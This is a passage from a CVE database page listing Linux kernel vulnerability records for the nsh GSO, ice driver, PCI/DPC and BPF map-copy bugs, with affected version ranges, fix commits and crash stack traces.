"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "4b911a9690d72641879ea6d13cce1de31d346d79",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nsh/nsh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnsh: Restore skb-\u003e{protocol,data,mac_header} for outer header in nsh_gso_segment().\n\nsyzbot triggered various splats (see [0] and links) by a crafted GSO\npacket of VIRTIO_NET_HDR_GSO_UDP layering the following protocols:\n\n ETH_P_8021AD + ETH_P_NSH + ETH_P_IPV6 + IPPROTO_UDP\n\nNSH can encapsulate IPv4, IPv6, Ethernet, NSH, and MPLS. As the inner\nprotocol can be Ethernet, NSH GSO handler, nsh_gso_segment(), calls\nskb_mac_gso_segment() to invoke inner protocol GSO handlers.\n\nnsh_gso_segment() does the following for the original skb before\ncalling skb_mac_gso_segment()\n\n 1. reset skb-\u003enetwork_header\n 2. save the original skb-\u003e{mac_heaeder,mac_len} in a local variable\n 3. pull the NSH header\n 4. resets skb-\u003emac_header\n 5. set up skb-\u003emac_len and skb-\u003eprotocol for the inner protocol.\n\nand does the following for the segmented skb\n\n 6. set ntohs(ETH_P_NSH) to skb-\u003eprotocol\n 7. push the NSH header\n 8. restore skb-\u003emac_header\n 9. set skb-\u003emac_header + mac_len to skb-\u003enetwork_header\n 10. restore skb-\u003emac_len\n\nThere are two problems in 6-7 and 8-9.\n\n (a)\n After 6 \u0026 7, skb-\u003edata points to the NSH header, so the outer header\n (ETH_P_8021AD in this case) is stripped when skb is sent out of netdev.\n\n Also, if NSH is encapsulated by NSH + Ethernet (so NSH-Ethernet-NSH),\n skb_pull() in the first nsh_gso_segment() will make skb-\u003edata point\n to the middle of the outer NSH or Ethernet header because the Ethernet\n header is not pulled by the second nsh_gso_segment().\n\n (b)\n While restoring skb-\u003e{mac_header,network_header} in 8 \u0026 9,\n nsh_gso_segment() does not assume that the data in the linear\n buffer is shifted.\n\n However, udp6_ufo_fragment() could shift the data and change\n skb-\u003emac_header accordingly as demonstrated by syzbot.\n\n If this happens, even the restored skb-\u003emac_header points to\n the middle of the outer header.\n\nIt seems nsh_gso_segment() has never worked with outer headers so far.\n\nAt the end of nsh_gso_segment(), the outer header must be restored for\nthe segmented skb, instead of the NSH header.\n\nTo do that, let\u0027s calculate the outer header position relatively from\nthe inner header and set skb-\u003e{data,mac_header,protocol} properly.\n\n[0]:\nBUG: KMSAN: uninit-value in ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]\nBUG: KMSAN: uninit-value in ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\nBUG: KMSAN: uninit-value in ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668\n ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]\n ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\n ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668\n ipvlan_start_xmit+0x5c/0x1a0 drivers/net/ipvlan/ipvlan_main.c:222\n __netdev_start_xmit include/linux/netdevice.h:4989 [inline]\n netdev_start_xmit include/linux/netdevice.h:5003 [inline]\n xmit_one net/core/dev.c:3547 [inline]\n dev_hard_start_xmit+0x244/0xa10 net/core/dev.c:3563\n __dev_queue_xmit+0x33ed/0x51c0 net/core/dev.c:4351\n dev_queue_xmit include/linux/netdevice.h:3171 [inline]\n packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3081 [inline]\n packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3819 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n __do_kmalloc_node mm/slub.c:3980 [inline]\n __kmalloc_node_track_caller+0x705/0x1000 mm/slub.c:4001\n kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582\n __\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:21.934Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9"
},
{
"url": "https://git.kernel.org/stable/c/46134031c20fd313d03b90169d64b2e05ca6b65c"
},
{
"url": "https://git.kernel.org/stable/c/bbccf0caef2fa917d6d0692385a06ce3c262a216"
},
{
"url": "https://git.kernel.org/stable/c/5a4603fbc285752d19e4b415466db18ef3617e4a"
},
{
"url": "https://git.kernel.org/stable/c/37ed6f244ec5bda2e90b085084e322ea55d0aaa2"
},
{
"url": "https://git.kernel.org/stable/c/696d18bb59727a2e0526c0802a812620be1c9340"
},
{
"url": "https://git.kernel.org/stable/c/29a07f2ee4d273760c2acbfc756e29eccd82470a"
},
{
"url": "https://git.kernel.org/stable/c/4b911a9690d72641879ea6d13cce1de31d346d79"
}
],
"title": "nsh: Restore skb-\u003e{protocol,data,mac_header} for outer header in nsh_gso_segment().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36933",
"datePublished": "2024-05-30T15:29:23.764Z",
"dateReserved": "2024-05-30T15:25:07.071Z",
"dateUpdated": "2025-05-04T09:12:21.934Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48886 (GCVE-0-2022-48886)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ice: Add check for kzalloc
Add the check for the return value of kzalloc in order to avoid
NULL pointer dereference.
Moreover, use the goto-label to share the clean code.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48886",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:38.619808Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:51.891Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_gnss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "96a9873188552ebb2afe76033d7329a5ecabef6e",
"status": "affected",
"version": "d6b98c8d242aee40e7b8919dd07b593b0739e38d",
"versionType": "git"
},
{
"lessThan": "40543b3d9d2c13227ecd3aa90a713c201d1d7f09",
"status": "affected",
"version": "d6b98c8d242aee40e7b8919dd07b593b0739e38d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/intel/ice/ice_gnss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Add check for kzalloc\n\nAdd the check for the return value of kzalloc in order to avoid\nNULL pointer dereference.\nMoreover, use the goto-label to share the clean code."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:29.340Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/96a9873188552ebb2afe76033d7329a5ecabef6e"
},
{
"url": "https://git.kernel.org/stable/c/40543b3d9d2c13227ecd3aa90a713c201d1d7f09"
}
],
"title": "ice: Add check for kzalloc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48886",
"datePublished": "2024-08-21T06:10:18.015Z",
"dateReserved": "2024-08-21T06:06:23.289Z",
"dateUpdated": "2025-05-04T08:25:29.340Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42302 (GCVE-0-2024-42302)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PCI/DPC: Fix use-after-free on concurrent DPC and hot-removal
Keith reports a use-after-free when a DPC event occurs concurrently to
hot-removal of the same portion of the hierarchy:
The dpc_handler() awaits readiness of the secondary bus below the
Downstream Port where the DPC event occurred. To do so, it polls the
config space of the first child device on the secondary bus. If that
child device is concurrently removed, accesses to its struct pci_dev
cause the kernel to oops.
That's because pci_bridge_wait_for_secondary_bus() neglects to hold a
reference on the child device. Before v6.3, the function was only
called on resume from system sleep or on runtime resume. Holding a
reference wasn't necessary back then because the pciehp IRQ thread
could never run concurrently. (On resume from system sleep, IRQs are
not enabled until after the resume_noirq phase. And runtime resume is
always awaited before a PCI device is removed.)
However starting with v6.3, pci_bridge_wait_for_secondary_bus() is also
called on a DPC event. Commit 53b54ad074de ("PCI/DPC: Await readiness
of secondary bus after reset"), which introduced that, failed to
appreciate that pci_bridge_wait_for_secondary_bus() now needs to hold a
reference on the child device because dpc_handler() and pciehp may
indeed run concurrently. The commit was backported to v5.10+ stable
kernels, so that's the oldest one affected.
Add the missing reference acquisition.
Abridged stack trace:
BUG: unable to handle page fault for address: 00000000091400c0
CPU: 15 PID: 2464 Comm: irq/53-pcie-dpc 6.9.0
RIP: pci_bus_read_config_dword+0x17/0x50
pci_dev_wait()
pci_bridge_wait_for_secondary_bus()
dpc_reset_link()
pcie_do_recovery()
dpc_handler()
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d0292124bb5787a2f1ab1316509e801ca89c10fb Version: ffe2318405e605f1b3985ce188eff69e6d1d1baa Version: 189f856e76f5463f59efb5fc18dcc1692d04c41a Version: 53b54ad074de1896f8b021615f65b27f557ce874 Version: 53b54ad074de1896f8b021615f65b27f557ce874 Version: 53b54ad074de1896f8b021615f65b27f557ce874 Version: 0081032082b5b45ca902b3c3d6986cb5cca69ff2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42302",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:10:28.656566Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:28.331Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/pci/pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c52f9e1a9eb40f13993142c331a6cfd334d4b91d",
"status": "affected",
"version": "d0292124bb5787a2f1ab1316509e801ca89c10fb",
"versionType": "git"
},
{
"lessThan": "2c111413f38ca5cf87557cab89f6d82b0e3433e7",
"status": "affected",
"version": "ffe2318405e605f1b3985ce188eff69e6d1d1baa",
"versionType": "git"
},
{
"lessThan": "f63df70b439bb8331358a306541893bf415bf1da",
"status": "affected",
"version": "189f856e76f5463f59efb5fc18dcc1692d04c41a",
"versionType": "git"
},
{
"lessThan": "2cc8973bdc4d6c928ebe38b88090a2cdfe81f42f",
"status": "affected",
"version": "53b54ad074de1896f8b021615f65b27f557ce874",
"versionType": "git"
},
{
"lessThan": "b16f3ea1db47a6766a9f1169244cf1fc287a7c62",
"status": "affected",
"version": "53b54ad074de1896f8b021615f65b27f557ce874",
"versionType": "git"
},
{
"lessThan": "11a1f4bc47362700fcbde717292158873fb847ed",
"status": "affected",
"version": "53b54ad074de1896f8b021615f65b27f557ce874",
"versionType": "git"
},
{
"status": "affected",
"version": "0081032082b5b45ca902b3c3d6986cb5cca69ff2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pci/pci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.10.176",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.15.104",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "6.1.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/DPC: Fix use-after-free on concurrent DPC and hot-removal\n\nKeith reports a use-after-free when a DPC event occurs concurrently to\nhot-removal of the same portion of the hierarchy:\n\nThe dpc_handler() awaits readiness of the secondary bus below the\nDownstream Port where the DPC event occurred. To do so, it polls the\nconfig space of the first child device on the secondary bus. If that\nchild device is concurrently removed, accesses to its struct pci_dev\ncause the kernel to oops.\n\nThat\u0027s because pci_bridge_wait_for_secondary_bus() neglects to hold a\nreference on the child device. Before v6.3, the function was only\ncalled on resume from system sleep or on runtime resume. Holding a\nreference wasn\u0027t necessary back then because the pciehp IRQ thread\ncould never run concurrently. (On resume from system sleep, IRQs are\nnot enabled until after the resume_noirq phase. And runtime resume is\nalways awaited before a PCI device is removed.)\n\nHowever starting with v6.3, pci_bridge_wait_for_secondary_bus() is also\ncalled on a DPC event. Commit 53b54ad074de (\"PCI/DPC: Await readiness\nof secondary bus after reset\"), which introduced that, failed to\nappreciate that pci_bridge_wait_for_secondary_bus() now needs to hold a\nreference on the child device because dpc_handler() and pciehp may\nindeed run concurrently. The commit was backported to v5.10+ stable\nkernels, so that\u0027s the oldest one affected.\n\nAdd the missing reference acquisition.\n\nAbridged stack trace:\n\n BUG: unable to handle page fault for address: 00000000091400c0\n CPU: 15 PID: 2464 Comm: irq/53-pcie-dpc 6.9.0\n RIP: pci_bus_read_config_dword+0x17/0x50\n pci_dev_wait()\n pci_bridge_wait_for_secondary_bus()\n dpc_reset_link()\n pcie_do_recovery()\n dpc_handler()"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:58.649Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c52f9e1a9eb40f13993142c331a6cfd334d4b91d"
},
{
"url": "https://git.kernel.org/stable/c/2c111413f38ca5cf87557cab89f6d82b0e3433e7"
},
{
"url": "https://git.kernel.org/stable/c/f63df70b439bb8331358a306541893bf415bf1da"
},
{
"url": "https://git.kernel.org/stable/c/2cc8973bdc4d6c928ebe38b88090a2cdfe81f42f"
},
{
"url": "https://git.kernel.org/stable/c/b16f3ea1db47a6766a9f1169244cf1fc287a7c62"
},
{
"url": "https://git.kernel.org/stable/c/11a1f4bc47362700fcbde717292158873fb847ed"
}
],
"title": "PCI/DPC: Fix use-after-free on concurrent DPC and hot-removal",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42302",
"datePublished": "2024-08-17T09:09:08.891Z",
"dateReserved": "2024-07-30T07:40:12.272Z",
"dateUpdated": "2025-05-04T12:57:58.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48940 (GCVE-0-2022-48940)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix crash due to incorrect copy_map_value
When both bpf_spin_lock and bpf_timer are present in a BPF map value,
copy_map_value needs to skirt both objects when copying a value into and
out of the map. However, the current code does not set both s_off and
t_off in copy_map_value, which leads to a crash when e.g. bpf_spin_lock
is placed in map value with bpf_timer, as bpf_map_update_elem call will
be able to overwrite the other timer object.
When the issue is not fixed, an overwriting can produce the following
splat:
[root@(none) bpf]# ./test_progs -t timer_crash
[ 15.930339] bpf_testmod: loading out-of-tree module taints kernel.
[ 16.037849] ==================================================================
[ 16.038458] BUG: KASAN: user-memory-access in __pv_queued_spin_lock_slowpath+0x32b/0x520
[ 16.038944] Write of size 8 at addr 0000000000043ec0 by task test_progs/325
[ 16.039399]
[ 16.039514] CPU: 0 PID: 325 Comm: test_progs Tainted: G OE 5.16.0+ #278
[ 16.039983] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ArchLinux 1.15.0-1 04/01/2014
[ 16.040485] Call Trace:
[ 16.040645] <TASK>
[ 16.040805] dump_stack_lvl+0x59/0x73
[ 16.041069] ? __pv_queued_spin_lock_slowpath+0x32b/0x520
[ 16.041427] kasan_report.cold+0x116/0x11b
[ 16.041673] ? __pv_queued_spin_lock_slowpath+0x32b/0x520
[ 16.042040] __pv_queued_spin_lock_slowpath+0x32b/0x520
[ 16.042328] ? memcpy+0x39/0x60
[ 16.042552] ? pv_hash+0xd0/0xd0
[ 16.042785] ? lockdep_hardirqs_off+0x95/0xd0
[ 16.043079] __bpf_spin_lock_irqsave+0xdf/0xf0
[ 16.043366] ? bpf_get_current_comm+0x50/0x50
[ 16.043608] ? jhash+0x11a/0x270
[ 16.043848] bpf_timer_cancel+0x34/0xe0
[ 16.044119] bpf_prog_c4ea1c0f7449940d_sys_enter+0x7c/0x81
[ 16.044500] bpf_trampoline_6442477838_0+0x36/0x1000
[ 16.044836] __x64_sys_nanosleep+0x5/0x140
[ 16.045119] do_syscall_64+0x59/0x80
[ 16.045377] ? lock_is_held_type+0xe4/0x140
[ 16.045670] ? irqentry_exit_to_user_mode+0xa/0x40
[ 16.046001] ? mark_held_locks+0x24/0x90
[ 16.046287] ? asm_exc_page_fault+0x1e/0x30
[ 16.046569] ? asm_exc_page_fault+0x8/0x30
[ 16.046851] ? lockdep_hardirqs_on+0x7e/0x100
[ 16.047137] entry_SYSCALL_64_after_hwframe+0x44/0xae
[ 16.047405] RIP: 0033:0x7f9e4831718d
[ 16.047602] Code: b4 0c 00 0f 05 eb a9 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d b3 6c 0c 00 f7 d8 64 89 01 48
[ 16.048764] RSP: 002b:00007fff488086b8 EFLAGS: 00000206 ORIG_RAX: 0000000000000023
[ 16.049275] RAX: ffffffffffffffda RBX: 00007f9e48683740 RCX: 00007f9e4831718d
[ 16.049747] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00007fff488086d0
[ 16.050225] RBP: 00007fff488086f0 R08: 00007fff488085d7 R09: 00007f9e4cb594a0
[ 16.050648] R10: 0000000000000000 R11: 0000000000000206 R12: 00007f9e484cde30
[ 16.051124] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
[ 16.051608] </TASK>
[ 16.051762] ==================================================================
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48940",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:21.126516Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:59.231Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/bpf.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "719d1c2524c89ada78c4c9202641c1d9e942a322",
"status": "affected",
"version": "68134668c17f31f51930478f75495b552a411550",
"versionType": "git"
},
{
"lessThan": "eca9bd215d2233de79d930fa97aefbce03247a98",
"status": "affected",
"version": "68134668c17f31f51930478f75495b552a411550",
"versionType": "git"
},
{
"lessThan": "a8abb0c3dc1e28454851a00f8b7333d9695d566c",
"status": "affected",
"version": "68134668c17f31f51930478f75495b552a411550",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/bpf.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix crash due to incorrect copy_map_value\n\nWhen both bpf_spin_lock and bpf_timer are present in a BPF map value,\ncopy_map_value needs to skirt both objects when copying a value into and\nout of the map. However, the current code does not set both s_off and\nt_off in copy_map_value, which leads to a crash when e.g. bpf_spin_lock\nis placed in map value with bpf_timer, as bpf_map_update_elem call will\nbe able to overwrite the other timer object.\n\nWhen the issue is not fixed, an overwriting can produce the following\nsplat:\n\n[root@(none) bpf]# ./test_progs -t timer_crash\n[ 15.930339] bpf_testmod: loading out-of-tree module taints kernel.\n[ 16.037849] ==================================================================\n[ 16.038458] BUG: KASAN: user-memory-access in __pv_queued_spin_lock_slowpath+0x32b/0x520\n[ 16.038944] Write of size 8 at addr 0000000000043ec0 by task test_progs/325\n[ 16.039399]\n[ 16.039514] CPU: 0 PID: 325 Comm: test_progs Tainted: G OE 5.16.0+ #278\n[ 16.039983] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ArchLinux 1.15.0-1 04/01/2014\n[ 16.040485] Call Trace:\n[ 16.040645] \u003cTASK\u003e\n[ 16.040805] dump_stack_lvl+0x59/0x73\n[ 16.041069] ? __pv_queued_spin_lock_slowpath+0x32b/0x520\n[ 16.041427] kasan_report.cold+0x116/0x11b\n[ 16.041673] ? 